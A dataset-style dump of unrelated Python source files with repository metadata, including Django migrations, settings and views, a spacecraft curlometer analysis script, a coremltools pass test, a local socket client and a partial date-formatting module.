log.write('epoch %d dev loss: %f\n'%(epoch, dev_loss))
log.write('epoch %d dev accuracy: %f\n'%(epoch, epcoh_accuracy))
log.write('best epoch now: %d\n\n'%best_epoch)
end_time = datetime.now()
print('train end at %s\n'%str(end_time))
log.write('train end at %s\n\n'%str(end_time))
timedelta = end_time - start_time
print('train cost time: %s\n'%str(timedelta))
print('best epoch last: %d\n'%best_epoch)
log.write('train cost time: %s\n\n'%str(timedelta))
log.write('best epoch last: %d\n\n'%best_epoch)
plot.plot_loss(all_train_loss, all_dev_loss, folder_path=folder_path, title='%s'%model_name)
plot.plot_accuracy(all_dev_accuracy, folder_path=folder_path, title='%s'%model_name)
| [
"[email protected]"
] | |
de17d29ef0e4c7870bf659be6303286e52e36dff | eb6a65c8eaa9d430d9b30240dccbfb4f99c34115 | /server/core/migrations/0006_deposit.py | c6c140460f87e2edff97534af98ed66cb9d832d8 | [] | no_license | dopeboy/underline | 17c2658b95cada089325cf28ad23211b4622e480 | 9028c444771f0ac8bd7d0f2c7ed326d338bf80ab | refs/heads/main | 2023-06-17T15:49:49.511694 | 2021-07-14T21:48:38 | 2021-07-14T21:48:38 | 335,760,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | # Generated by Django 3.1.6 on 2021-02-25 22:31
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('core', '0005_slip_entry_amount'),
]
operations = [
migrations.CreateModel(
name='Deposit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.DecimalField(decimal_places=2, default=0, max_digits=6)),
('transaction_details', models.JSONField()),
('order_data', models.JSONField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
4973e698c7ce6debf75044283b024b5fb6d6c342 | 765c2f42845173a915792f66acd122d7826e4410 | /CRF/source/change_test_format.py | fae645f3564e1afac826ded98e82e37ad40124e3 | [] | no_license | ShrutiGanesh18/joint-ner-re | aa964cad43affa815bfc437ed583126632cdee99 | d8bec136c24b89b0321a415b3031b27c9d0cc96d | refs/heads/master | 2021-08-22T15:08:40.388252 | 2017-11-30T13:58:26 | 2017-11-30T13:58:26 | 112,617,288 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | f = open("test_output", "r")
g = open("evaluate_test_output", "w")
for line in f:
if line=="\n":
g.write("\n")
else:
args=line.split()
g.write(args[0]+" "+args[1]+" "+args[4]+" "+args[5]+"\n")
f.close()
g.close()
| [
"[email protected]"
] | |
4857276be5e2c578f37cec04bf6cd1501343a4b6 | 9c33dafed8efa674448c56ae271d38b86ee936c4 | /final review demo/communication.py | 871b28f1e081c04cf5862ead750f40e2b379bc7f | [] | no_license | ARC-syn/UP-2 | ab98d20fe4ba99d07452d0b8d7de2b79120fe0b5 | 70aa718865f0cb5b228c80d0fb76cb9cc99d6b76 | refs/heads/main | 2023-05-04T12:35:01.550207 | 2021-05-25T19:03:23 | 2021-05-25T19:03:23 | 340,664,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,907 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 25 23:39:57 2021
@author: MrSan
"""
import socket
import struct
class comm:
def __init__(self):
self.ClientSocket = socket.socket()
host = '127.0.0.1'
port = 1233
print('Waiting for connection')
try:
self.ClientSocket.connect((host, port))
except socket.error as e:
print(str(e))
print('connected')
def getTarget(self):
#------------send request to server as zero---------------------------
req = 0
req = req.to_bytes(2, 'big')
self.ClientSocket.send(req)
#-----------recive latitude and longituse as response------------------
lat = self.ClientSocket.recv(4) #recive latitude
[lat] = struct.unpack('f', lat) #conver response from byte to float
self.lat = lat
print(lat)
lon = self.ClientSocket.recv(4) #recive longitude
[lon] = struct.unpack('f', lon) #conver longituse from byte to float
self.lon = lon
print(lon)
def sendTarget(self, lat, lon):
#------------------send request as one--------------------------------
req = 1
req = req.to_bytes(2, 'big')
self.ClientSocket.send(req)
#---------------------send target cordinates---------------------------
lat = bytearray(struct.pack("f", lat)) #convert latitude from float to byte
self.ClientSocket.send(lat) #send latitude in byte formate
lon = bytearray(struct.pack("f", lon)) #convert longitude from float to byte
self.ClientSocket.send(lon) #send longitude in byte formate
new = comm()
new.sendTarget(2.345, 5.678)
| [
"[email protected]"
] | |
1d6ab9387bb79ad61478237022abe9051420f9df | e523770b755a43accfa02ee3ea86af4aeac438e7 | /0_startcamp/day1/list1.py | fe1002030eee81ac5ee114d5bc0f89f22c828945 | [] | no_license | AhnDogeon/TIL | a21f8e70bdd917fd1ec58d55955fa6b3e70c4ca4 | b4ae78b7c6c08ab6076312ba3b44493248ab5195 | refs/heads/master | 2022-11-30T10:14:32.880643 | 2021-02-11T16:09:27 | 2021-02-11T16:09:27 | 162,255,917 | 1 | 1 | null | 2022-11-22T03:46:04 | 2018-12-18T08:32:42 | Jupyter Notebook | UTF-8 | Python | false | false | 201 | py | numbers = [1, 2, 3] # 변수 이름은 뜻을 담아서 짓자!
family =['mom', 1.64, 'dad', 1.75, 'sister', 1.78, True]
mcu = [
['ironman', 'captain'],
['xmen','deadpool'],
['spiderman']
] | [
"[email protected]"
] | |
ef4059d5bcb4e277045e6b56baedb795edbd75a0 | 29d2ec5d980fc950d3404fe6e1bce36a6a797af8 | /mms_curlometer.py | 383871c028c4921b8ff0ec56ef57213767c1812d | [] | no_license | KBergst/mms-structure-finder | 9d7b6f3fb1e608ff12052f9d5fc20fcb39ea48e7 | 6a913b1a672dcb670dcde0007741e1fb2750a9dc | refs/heads/master | 2023-07-11T19:51:05.823863 | 2019-07-08T15:15:32 | 2019-07-08T15:15:32 | 190,035,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,819 | py | #full_curlometer.py code adapted for use with MMS CDF files
#import sys #for stopping while debugging
import numpy as np # for matrix calculations
import math # for pi and sqrt
#import glob # for sensible listdir()
import cdflib #for importing cdf files
from copy import deepcopy # for obtaining variables in CEF files
#import matplotlib.pyplot as plt # for plotting
import datetime as dt # for dates
from matplotlib import dates # for formatting axes
import pytz #for my own time stuff
import scipy.interpolate as interp #for interpolating to MMS1 timeseries
import os #for generalization to all systems
#user created modules:
import mmstimes as mt
# User-defined variables:
# Base path:
path = os.getcwd()
# File location key name:
loc_file = r"key_for_curlometer.txt"
# Output file location key name:
out_loc_file = r"curlometer_files.txt"
#directories for outputs, input data:
outpath="Curlometer_data"
datpath="MMS"
# output file start for output current density (minus number):
outfile = os.path.join(path,outpath,"output")
# output file location key (full path)
keyfile = os.path.join(path,outpath,out_loc_file)
# Plot filenames:
BJQFileName = 'test_BJQ.png'
GeomFileName = 'test_Geom.png'
# X-axis labels:
XAxisLabel = 'Time on 26 July 2017'
# Desired resolution of data for the curlometer calculation
window = 1/128 # in seconds, 0.2 = minimum FOR CLUSTER
def filenames_get(name_list_file):
name_list=[]
with open(name_list_file,"r") as name_file_obj: #read-only access
for line in name_file_obj:
line_clean =line.rstrip('\n') #removes newline chars from lines
name_list.append(line_clean)
return name_list
def get_cdf_var(filename,varnames):
"""
pulls particular variables from a CDF
note: if variable has more than one set of data (E.g. b-field with x,y,z
components) it will be necessary to format the data by reshaping the array
from a 1D to a 2D array
(may find workaround/better way later)
"""
cdf_file=cdflib.CDF(filename,varnames)
data=[]
for varname in varnames:
var_data=np.array(cdf_file.varget(varname)) #TRYING NO NP ARRAY (DEBUG)
data.append(var_data)
return data
def time_converter(time_nanosecs):
"""
converts MMS CDF times (nanoseconds, TT 2000) to
matplotlib datetime objects
"""
#TODO: make sure this thing is working correctly!!!
start_date=dt.datetime(2000,1,1,hour=11,minute=58,second=55,
microsecond=816000)
# see https://aa.usno.navy.mil/faq/docs/TT.php for explanation of
# this conversion time
start_num=dates.date2num(start_date) #num of start date of time data
fudge_factor=5/60/60/24 #correction amount (unsure why need)
#incidentally 5 is the number of leap seconds since 2000. Coincidence?
time_days=time_nanosecs/1e9/60/60/24 #convert nanoseconds to days
time_num=time_days+start_num-fudge_factor #convert TT2000 to matplotlib num time
times=[]
if time_num.size>1:
for t in time_num:
t_dt=dates.num2date(t) #conversion to datetime object
t_utc=t_dt.astimezone(pytz.utc) #officially set timezone to UTC
times.append(t_utc)
return times
else:
t_dt=dates.num2date(time_num) #conversion to datetime object
t_utc=t_dt.astimezone(pytz.utc) #officially set timezone to UTC
return t_utc
'''The Curlometer Function'''
def delta(ref, i):
delrefi = i - ref
return delrefi
def curlometer(d1, d2, d3, d4):
km2m = 1e3
nT2T = 1e-9
mu0 = (4*math.pi)*1e-7
C1R = np.array([d1[3], d1[4], d1[5]])*km2m
C1B = np.array([d1[0], d1[1], d1[2]])*nT2T
C2R = np.array([d2[3], d2[4], d2[5]])*km2m
C2B = np.array([d2[0], d2[1], d2[2]])*nT2T
C3R = np.array([d3[3], d3[4], d3[5]])*km2m
C3B = np.array([d3[0], d3[1], d3[2]])*nT2T
C4R = np.array([d4[3], d4[4], d4[5]])*km2m
C4B = np.array([d4[0], d4[1], d4[2]])*nT2T
delB14 = delta(C4B, C1B)
delB24 = delta(C4B, C2B)
delB34 = delta(C4B, C3B)
delR14 = delta(C4R, C1R)
delR24 = delta(C4R, C2R)
delR34 = delta(C4R, C3R)
# J
# Have to 'convert' this to a matrix to be able to get the inverse.
R = np.matrix(([np.cross(delR14, delR24), np.cross(delR24, delR34),
np.cross(delR14, delR34)]))
Rinv = R.I
# I(average) matrix:
Iave = ([np.dot(delB14, delR24) - np.dot(delB24, delR14)],
[np.dot(delB24, delR34) - np.dot(delB34, delR24)],
[np.dot(delB14, delR34) - np.dot(delB34, delR14)])
JJ = (Rinv*Iave)/mu0
# div B
lhs = np.dot(delR14, np.cross(delR24, delR34))
rhs = np.dot(delB14, np.cross(delR24, delR34)) + \
np.dot(delB24, np.cross(delR34, delR14)) + \
np.dot(delB34, np.cross(delR14, delR24))
divB = abs(rhs)/abs(lhs)
# div B / curl B
curlB = JJ*mu0
magcurlB = math.sqrt(curlB[0]**2 + curlB[1]**2 + curlB[2]**2)
divBbycurlB = divB/magcurlB
return [JJ, divB, divBbycurlB]
# End of curlometer function
'''Read in all the data using CEFLIB.read '''
MMS_num = [str(x) for x in range(1,5)]
MMS=['MMS'+str(x) for x in range(1,5)]
loc_file_whole=os.path.join(path,loc_file)
bfield_files=filenames_get(loc_file_whole)
#iterating over each time interval
for file_num,file in enumerate(bfield_files):
time = {}
time_pos = {} #because MMS has different time series for position data
B = {}
pos = {}
for n,M_num in enumerate(MMS_num):
file_whole=os.path.join(path,datpath,M_num,"mms"+M_num+file)
tmp1,tmp2,misshape_1,misshape_2=get_cdf_var(file_whole,
['Epoch','Epoch_state',
'mms'+M_num+'_fgm_b_gsm_brst_l2',
'mms'+M_num+'_fgm_r_gsm_brst_l2'])
tmp3=misshape_1.reshape(misshape_1.size//4,4)
tmp4=misshape_2.reshape(misshape_2.size//4,4)
time[MMS[n]] = deepcopy(tmp1) #in NANOSECONDS
time_pos[MMS[n]]=deepcopy(tmp2)
B[MMS[n]] = deepcopy(tmp3)
pos[MMS[n]] = deepcopy(tmp4)
'''Align all to MMS1 time coordinates using linear interpolation '''
clean = {}
#interpolate all data for MMS 2,3,4 (yes I know it is a mess)
B_interp=[]
pos_interp=[]
for n in range(1,4):
B_interp.append(interp.interp1d(time[MMS[n]],B[MMS[n]],kind='linear',
axis=0,assume_sorted=True))
for n in range(4):
pos_interp.append(interp.interp1d(time_pos[MMS[n]],pos[MMS[n]],kind='linear',
axis=0,assume_sorted=True))
tarr=[] #array of good times (helpful to have outside dict)
for i,t in enumerate(time[MMS[0]]):
if ((time[MMS[1]]-t>0).all() or (time[MMS[2]]-t>0).all() or
(time[MMS[3]]-t>0).all()):
#time is outside of bounds of interpolation for at least one craft
continue
if ((time[MMS[1]]-t<0).all() or (time[MMS[2]]-t<0).all() or
(time[MMS[3]]-t<0).all()):
#time is outside of bounds of interpolation for at least one craft
continue
clean[t]={}
tarr.append(t)
for j,M_str in enumerate(MMS):
if M_str =="MMS1":
clean[t][M_str] = [B[M_str][i][0],
B[M_str][i][1],
B[M_str][i][2],
pos_interp[j](t)[0],
pos_interp[j](t)[1],
pos_interp[j](t)[2]]
else:
clean[t][M_str] = [B_interp[j-1](t)[0],
B_interp[j-1](t)[1],
B_interp[j-1](t)[2],
pos_interp[j](t)[0],
pos_interp[j](t)[1],
pos_interp[j](t)[2]]
mintime, maxtime = min(clean.keys()), max(clean.keys())
# Time array (min, max, step)
nwin = len(tarr)
Jave = np.zeros(nwin, dtype = [('time', float),('Jx', float),
('Jy', float),('Jz', float),
('divB', float),
('divBcurlB', float)])
for i,t in enumerate(clean):
if len(clean[t]) == 4:
onej = curlometer(clean[t]['MMS1'],clean[t]['MMS2'],
clean[t]['MMS3'],clean[t]['MMS4'])
Jave['time'][i] = t #in nanosecs
Jave['Jx'][i] = onej[0][0]
Jave['Jy'][i] = onej[0][1]
Jave['Jz'][i] = onej[0][2]
Jave['divB'][i] = onej[1]
Jave['divBcurlB'][i] = onej[2]
else:
Jave['time'][i] = t
Jave['Jx'][i] = np.nan
Jave['Jy'][i] = np.nan
Jave['Jz'][i] = np.nan
Jave['divB'][i] = np.nan
Jave['divBcurlB'][i] = np.nan
'''Write all results out to file, tarr is already sorted'''
with open(outfile+str(file_num)+".txt", 'w') as f:
for j in Jave:
t_dt=mt.TTtime2datetime(j['time'])
time_string=mt.datetime2str(t_dt)
outstring = "{},{},{},{},{}\n".format(time_string,j['Jx'],
j['Jy'],j['Jz'],j['divBcurlB'])
f.write(outstring)
''' Write out what the output files are to the output key file '''
with open(keyfile, 'w') as f:
for file_num,file in enumerate(bfield_files):
outstring=outfile+str(file_num)+".txt"+'\n'
f.write(outstring)
#TODO: Possibly try different interpolation styles than linear?
| [
"[email protected]"
] | |
972e96e0720ba97f5e6daa01c0c6ae41da58743c | 40195e6f86bf8620850f0c56e98eae5693e88277 | /coremltools/converters/mil/frontend/tensorflow2/ssa_passes/test_v2_passes.py | 8b9ec829878c1c138997390b2bd3ce30180b7664 | [
"MIT",
"BSD-3-Clause"
] | permissive | apple/coremltools | 009dfa7154d34cab8edcafa618e689e407521f50 | feed174188f7773631a3d574e1ff9889a135c986 | refs/heads/main | 2023-09-01T23:26:13.491955 | 2023-08-31T18:44:31 | 2023-08-31T18:44:31 | 95,862,535 | 3,742 | 705 | BSD-3-Clause | 2023-09-14T17:33:58 | 2017-06-30T07:39:02 | Python | UTF-8 | Python | false | false | 1,850 | py | # Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import copy
import numpy as np
from coremltools.converters.mil.mil import Builder as mb
from coremltools.converters.mil.mil import types
from coremltools.converters.mil.mil.passes.pass_registry import PASS_REGISTRY
from coremltools.converters.mil.testing_utils import (assert_model_is_valid,
assert_same_output_names)
np.random.seed(1984)
validate_model = True
def test_remove_vacuous_cond():
@mb.program(
input_specs=[
mb.TensorSpec(shape=(1,), dtype=types.bool),
mb.TensorSpec(shape=(2, 3)),
]
)
def prog(a, b):
def then_branch():
return mb.identity(x=b)
def else_branch():
return mb.identity(x=b)
pred = mb.squeeze(x=a)
return mb.cond(pred=pred, _true_fn=then_branch, _false_fn=else_branch)
cond_op = prog.find_ops(op_type="cond", exactly_one=True)[0]
original_cond_op_name = cond_op.name
assert len(cond_op.blocks[0].operations) == 1
assert len(cond_op.blocks[1].operations) == 1
assert cond_op.blocks[0].operations[0].op_type == "identity"
assert cond_op.blocks[1].operations[0].op_type == "identity"
prev_prog = copy.deepcopy(prog)
PASS_REGISTRY["tensorflow2::remove_vacuous_cond"](prog)
assert_same_output_names(prev_prog, prog)
cond_op = prog.find_ops(op_type="cond")
assert len(cond_op) == 0
identity_op = prog.find_ops(prefix=original_cond_op_name, exactly_one=True)[0]
assert identity_op.op_type == "identity"
if validate_model:
assert_model_is_valid(prog, {"a": (1,), "b": (2, 3)})
| [
"[email protected]"
] | |
7a6926b4dee56ee9dd1021485553feb60dee8c57 | e99017069ca8bed159f15a9decbbe6710ad87b2a | /troof/settings.py | 288b42c7dd9bffc910a7d1b364950f4369740113 | [] | no_license | jpkim921/trooff | 0d145deea519337eab886e25ca2cd27ac80481fd | 37920d67e54681df6ff765c6dba1ff20791f7dd1 | refs/heads/master | 2020-12-04T17:48:38.760280 | 2020-05-19T14:39:15 | 2020-05-19T14:39:15 | 231,856,747 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,401 | py | from .additional_settings import *
"""
Django settings for troof project.
Generated by 'django-admin startproject' using Django 3.0.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# SECRET_KEY = 'haha'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# "accounts",
'accounts.apps.AccountsConfig',
"pages",
"donations",
# "donors"
"products",
"django_filters",
"store",
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'troof.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, "templates")],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'troof.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
MEDIA_URL = '/images/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'static/images') | [
"[email protected]"
] | |
8aa0f39e07e9651a42f290f8faecb7f2935690eb | 330eb2728ecbe6c6a76e95e34ded5c073c8d2af3 | /sonora_portal001/artistas/views.py | 11b6ca60e40a56c727d70bdc5c0c6a86e2c239da | [] | no_license | Vieceli/sonora_portal001 | ca503b82b69f51e23399d50ae68f1e765144628a | ee282fa2e35cc61abf0393f8f0aebac91eff2e22 | refs/heads/master | 2021-01-23T22:53:11.536090 | 2011-07-20T18:00:07 | 2011-07-20T18:00:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | # Create your views here.
from artistas.forms import ArtistaForm
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.template.context import RequestContext
from artistas.models import Artista
def artistas(request,template_name):
usuario=request.user
noticias = Artista.objects.all().order_by('-atualizado_em')
return render_to_response(template_name, locals(), context_instance=RequestContext(request))
def artista(request,template_name, artista_slug):
usuario=request.user
# if request.method == 'GET':
# GET = request.GET
# if GET.has_key('a'):
# form = ArtistaForm(request.GET'
noticia = get_object_or_404(Artista, slug=artista_slug)
noticias_recentes = Artista.objects.all().order_by('-atualizado_em')
if request.method == 'POST':
POST=request.POST
print POST
artista_form = ArtistaForm(request.POST)
if artista_form.is_valid():
artista_form.save()
return HttpResponseRedirect('/Obrigado/')
else:
artista_form = ArtistaForm()
return render_to_response(template_name, locals(), context_instance=RequestContext(request))
| [
"[email protected]"
] | |
e61da909e3d710561f6645f4e8ff84bd9716d626 | 8db7e81c480dc66c8e31ccdd30fd979cc0b9e40e | /Rating Application/Untapped Rating Interface/run_program.py | b9839f470c5eb47bc12761fa73c7688f4ddf7cbc | [] | no_license | Timpryor91/beer_style_rating | cb304e8a4e32c201940a16eafc3183965d4c51a5 | e738f1a9c56efb9c505a88770ad52ee8059fd1e0 | refs/heads/master | 2023-05-13T23:32:31.021584 | 2021-05-28T12:43:05 | 2021-05-28T12:43:05 | 340,421,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | # -*- coding: utf-8 -*-
"""
@author: timpr
"""
# from tool_interface import initiate_interface
from tool_interface import Interface
from modules.beer_data import import_beer_data
import tkinter as tk
# Run the application
if __name__ == "__main__":
# Import beer style names and statistics
style_avgs, style_stdevs, all_beers = import_beer_data()
# # Launch interface
# initiate_interface(style_avgs, style_stdevs, all_beers)
#Initiate tool interface
window = tk.Tk()
tool_interface = Interface(window, style_avgs, style_stdevs, all_beers)
window.mainloop() | [
"[email protected]"
] | |
2f2a5ca2e0a1306df87c7be41fa4cd4ff935189e | c84a552307fa5aee2aa3aa086171c06b8d83390a | /quiz/views/contest.py | db3950e0f06ee31bc860bf53f3dc7378bb94cae1 | [] | no_license | dien-hust63/Django-QuizSite | a00a05473b57b43577e981048f4800cf657783f4 | c69c30b8b525a17ac6f8d5f4b3fcdcb76f530a86 | refs/heads/main | 2023-05-03T18:48:29.780670 | 2021-05-23T04:19:27 | 2021-05-23T04:19:27 | 370,032,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,842 | py | from django.shortcuts import render, redirect
from quiz.models import *
from django.views import generic
from django.shortcuts import get_object_or_404
from quiz.forms import QuizTestForm, CustomUserCreationForm, QuizForm
from django.contrib.auth import authenticate, login
from django.contrib import messages
from django.contrib.auth.models import Group
from django.contrib.auth.decorators import login_required
from django.views.generic.edit import CreateView, DeleteView, UpdateView
from django.urls import reverse
import json
@login_required(login_url = 'login')
def quizes(request, pk):
category = Category.objects.get(pk = pk)
quiz_list = Quiz.objects.filter(category=category)
context = {
'category': category,
'quiz_list' : quiz_list,
}
return render(request, 'contest/contest_quiz_list.html', context = context)
@login_required(login_url = 'login')
def quiz_confirm(request, category_id, quiz_id):
quiz = get_object_or_404(Quiz, pk=quiz_id)
context = {
'quiz': quiz,
}
return render(request, 'contest/contest_quiz_confirm.html', context = context)
@login_required(login_url = 'login')
def quiz_detail(request, category_id, quiz_id):
quiz = get_object_or_404(Quiz, pk=quiz_id)
questions = Question.objects.filter(quiz=quiz)
if request.method == 'POST':
form = QuizTestForm(request.POST, extra=questions, detail_result=0)
if form.is_valid():
final_result = save_result(request, form, quiz, questions)
save_detail_result(form, questions, final_result)
context = {
'result': final_result,
'quiz': quiz,
}
return redirect(reverse('results', kwargs={'result_id':final_result.id}))
else:
form = QuizTestForm(extra=questions,detail_result=0)
context = {
'form':form,
'quiz':quiz,
}
return render(request, 'contest/contest_quiz_detail.html', context = context)
def show_results(request, result_id):
result = Result.objects.get(id = result_id)
quiz = result.quiz
context = {
'result':result,
'quiz':quiz
}
return render(request, 'contest/contest_results.html', context = context )
def show_detail_result(request, result_id):
result = get_object_or_404(Result, id = result_id)
# detail_result = get_object_or_404(DetailResult, result=result)
questions = Question.objects.filter(quiz=result.quiz)
form = QuizTestForm(extra=questions, detail_result=1)
context = {
'form':form,
}
return render(request, 'contest/contest_detail_result.html', context = context)
def save_result(request, form, quiz, questions):
results = 0
for question in questions:
correct_answers = question.get_correct_answer
user_answers = form.cleaned_data[f"{question.id}"]
correct_answers_len = len(correct_answers)
if correct_answers_len == len(user_answers):
for i in range(len(correct_answers)):
if str(correct_answers[i]) != user_answers[i]:
break
results = results + question.score
final_result = Result.objects.create(
final_score = results,
quiz = quiz,
user = request.user
)
final_result.save()
return final_result
def save_detail_result(form, questions, final_result):
for question in questions:
user_answers = form.cleaned_data[f'{question.id}']
for answer in user_answers:
detail_result = DetailResult.objects.create(
result= final_result,
question=question,
answer = answer
)
detail_result.save()
return None
#TODO: handle when timeout
#check register
#show result
| [
"[email protected]"
] | |
1c296da03be34c0ca03a869d860edac26218380f | 6f2380fe4087783603a36ce966ab9b5e99ac4cbb | /demo1/booktest/migrations/0006_auto_20190708_1351.py | 83b1a21d8b7535ca7bef558a2df9a3dfcc4021b3 | [] | no_license | zhlxcl/Python1904xcl | aab0d4989d9065bff5d5334a1a1e1188cbd3619d | f4cc21ed0fb6d40349490a084b983b4e897c8d91 | refs/heads/master | 2022-12-14T20:12:16.014524 | 2019-07-19T08:47:19 | 2019-07-19T08:47:19 | 194,625,840 | 0 | 0 | null | 2022-11-22T04:07:44 | 2019-07-01T07:53:59 | JavaScript | UTF-8 | Python | false | false | 783 | py | # Generated by Django 2.2.3 on 2019-07-08 05:51
from django.db import migrations, models
import django.db.models.manager
class Migration(migrations.Migration):
dependencies = [
('booktest', '0005_heroinfo_type'),
]
operations = [
migrations.CreateModel(
name='Ads',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('desc', models.CharField(max_length=20)),
('img', models.ImageField(upload_to='ads')),
],
),
migrations.AlterModelManagers(
name='heroinfo',
managers=[
('myobjects', django.db.models.manager.Manager()),
],
),
]
| [
"[email protected]"
] | |
15c40d56d32074dfb192bd80aec27d245d6634b0 | 027698c1805955cb7222f682a0b3939e0f8405a1 | /dataType/dict_p1.py | a517ae07cd48e935d0bd71680f8585213ef042aa | [] | no_license | mrbartrns/introducing-to-CS | e0c114ce175169d6750bdee9fd8ddf3ad264f18e | 2fceef111ebed0ee0e8266997973dd410f45e7fa | refs/heads/master | 2022-12-07T23:46:33.329046 | 2020-08-30T14:39:04 | 2020-08-30T14:39:04 | 280,989,138 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | animals = { 'a': ['aadvrark'], 'b':['baboon'], 'c':['coati']}
animals['d'] = ['donkey']
animals['d'].append('dog')
animals['d'].append('dingo')
def how_many(animals):
count = 0
for k in animals:
count += len(animals[k])
return count
def biggest(aDict):
'''
aDict: A dictionary, where all the values are lists.
returns: The key with the largest number of values associated with it
'''
count = 0
biggestKey = ''
if aDict == {}:
return None
else:
for k in aDict:
if count < len(aDict[k]):
count = len(aDict[k])
biggestKey = k
return biggestKey
print(biggest({}))
#list와 array의 차이: list는 같은 여러 종류의 데이터 타입을 담을 수 있는 반면, array는 한종류만 가능
def fib_efficient(n:int, d:dict): #n is for key in dict
ans = 0
if n in d:
return d[n]
else:
ans += fib_efficient(n - 1, d) + fib_efficient(n - 2, d)
d[n] = ans
return ans
d = {1: 1, 2: 2} | [
"[email protected]"
] | |
ca756c26eab8193970e8afce664fde448e00dc44 | e845f7f61ff76b3c0b8f4d8fd98f6192e48d542a | /djangocg/utils/dateformat.py | 7d4066b71cc299624e0bb228c36944639457df5d | [
"BSD-3-Clause"
] | permissive | timothyclemans/djangocg | fd150c028013cb5f53f5a3b4fdc960a07fdaaa78 | 52cf28e046523bceb5d436f8e6bf61e7d4ba6312 | refs/heads/master | 2021-01-18T13:20:13.636812 | 2012-08-31T23:38:14 | 2012-08-31T23:38:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,943 | py | """
PHP date() style date formatting
See http://www.php.net/date for format strings
Usage:
>>> import datetime
>>> d = datetime.datetime.now()
>>> df = DateFormat(d)
>>> print(df.format('jS F Y H:i'))
7th October 2003 11:39
>>>
"""
from __future__ import unicode_literals
import re
import time
import calendar
import datetime
from djangocg.utils.dates import MONTHS, MONTHS_3, MONTHS_ALT, MONTHS_AP, WEEKDAYS, WEEKDAYS_ABBR
from djangocg.utils.tzinfo import LocalTimezone
from djangocg.utils.translation import ugettext as _
from djangocg.utils.encoding import force_text
from djangocg.utils import six
from djangocg.utils.timezone import is_aware, is_naive
re_formatchars = re.compile(r'(?<!\\)([aAbBcdDeEfFgGhHiIjlLmMnNoOPrsStTUuwWyYzZ])')
re_escaped = re.compile(r'\\(.)')
class Formatter(object):
def format(self, formatstr):
pieces = []
for i, piece in enumerate(re_formatchars.split(force_text(formatstr))):
if i % 2:
pieces.append(force_text(getattr(self, piece)()))
elif piece:
pieces.append(re_escaped.sub(r'\1', piece))
return ''.join(pieces)
class TimeFormat(Formatter):
def __init__(self, t):
self.data = t
def a(self):
"'a.m.' or 'p.m.'"
if self.data.hour > 11:
return _('p.m.')
return _('a.m.')
def A(self):
"'AM' or 'PM'"
if self.data.hour > 11:
return _('PM')
return _('AM')
def B(self):
"Swatch Internet time"
raise NotImplementedError
def f(self):
"""
Time, in 12-hour hours and minutes, with minutes left off if they're
zero.
Examples: '1', '1:30', '2:05', '2'
Proprietary extension.
"""
if self.data.minute == 0:
